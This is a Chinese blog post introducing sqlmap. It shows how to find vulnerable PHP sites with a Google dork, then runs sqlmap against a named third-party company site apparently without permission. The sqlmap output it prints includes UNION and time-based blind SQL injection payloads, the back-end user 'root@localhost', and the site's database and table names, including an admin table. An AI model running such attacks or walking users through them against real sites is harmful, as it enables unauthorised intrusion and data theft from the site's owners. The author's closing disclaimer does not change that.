一 什么是sqlmap
1 sqlmap is an open source penetration testing tool that automates the 2 process of detecting and exploiting SQL injection flaws and taking over of 3 database servers. It comes with a powerful detection engine, many niche 4 features for the ultimate penetration tester and a broad range of switches 5 lasting from database fingerprinting, over data fetching from the 6 database, 7 to accessing the underlying file system and executing commands on the 8 operating system via out-of-band connections.
sqlmap 是一个开源的自动探测和发现sql注入漏洞以及拿下数据库服务器的工具.它有一个强大的探测引擎,许多有些的特性支持探测服务器以及拿下数据库服务器.
** 简言之 sqlmap 是个拿站工具.
二 安装.
python 2.6 或2.7 ,mark 只是这两个主版本.sqlmap 安装可以用easy_install 或者用git clone 从仓库拿.
三 寻站
google hack 啊, inurl:".php?id=
就试下第二个吧.www.cowinbio.com/about/index.php?id=1
开干
1 blind (heavy query)' injectable 2 [10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' 3 [10:07:47] [INFO] automatically extending ranges for UNION query injection tech 4 ique tests as there is at least one other (potential) technique found 5 [10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns 6 [10:07:49] [WARNING] combined UNION/error-based SQL injection case found on col 7 mn 1. sqlmap will try to find another column with better characteristics 8 [10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 c 9 lumns' injectable 10 GET parameter 'id' is vulnerable. Do you want to keep testing the others (if an 11 )? [y/N] n 12 sqlmap identified the following injection point(s) with a total of 2626 HTTP(s) 13 requests: 14 --- 15 Parameter: id (GET) 16 Type: AND/OR time-based blind
然后
1 _ 2 ___ ___| |_____ ___ ___ {1.0-dev-c6d4217} 3 |_ -| . | | | .'| . | 4 |___|_ |_|_|_|_|__,| _| 5 |_| |_| http://sqlmap.org 6 7 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu 8 consent is illegal. It is the end user's responsibility to obey all applicabl 9 local, state and federal laws. Developers assume no liability and are not resp 10 sible for any misuse or damage caused by this program 11 12 [*] starting at 10:15:04 13 14 you provided 'MySQL' as a back-end DBMS, but from a past scan information on t 15 target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really 16 ant to force the back-end DBMS value? [y/N] y 17 [10:15:22] [INFO] testing connection to the target URL 18 [10:15:22] [WARNING] there is a DBMS error found in the HTTP response body whi 19 could interfere with the results of the tests 20 [10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/ 21 S 22 sqlmap resumed the following injection point(s) from stored session: 23 --- 24 Parameter: id (GET) 25 Type: AND/OR time-based blind 26 Title: MySQL <= 5.0.11 AND time-based blind (heavy query) 27 Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a)) 28 29 Type: UNION query 30 Title: Generic UNION query (NULL) - 2 columns 31 Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7 32 7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU 33 -- - 34 --- 35 [10:15:23] [INFO] testing MySQL 36 [10:15:23] [INFO] confirming MySQL 37 [10:15:23] [INFO] the back-end DBMS is MySQL 38 web application technology: PHP 5.6.9 39 back-end DBMS: MySQL < 5.0.0 40 [10:15:23] [INFO] fetching current user 41 current user: 'root@localhost'
再之后
_ ___ ___| |_____ ___ ___ {1.0-dev-c6d4217} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respo sible for any misuse or damage caused by this program [*] starting at 10:16:44 [10:16:44] [INFO] testing connection to the target URL [10:16:44] [WARNING] there is a DBMS error found in the HTTP response body whic could interfere with the results of the tests [10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/I S sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a)) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79 7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL -- - --- [10:16:45] [INFO] testing MySQL [10:16:45] [INFO] confirming MySQL [10:16:45] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.9 back-end DBMS: MySQL < 5.0.0 [10:16:45] [INFO] fetching current database current database: 'cw'
1 Database: cw 2 [3 tables] 3 +---------+ 4 | admin | 5 | news | 6 | product | 7 +---------+
就到这里吧. 毕竟是写博客.本人并没有再进一步深入,希望各位看官也不要再进一步尝试了.
另外友情提醒这个站 ,你们不太安全.
郑重声明以上文章本人原创,转载请标明出处. 小三爷 此处谢过了~~.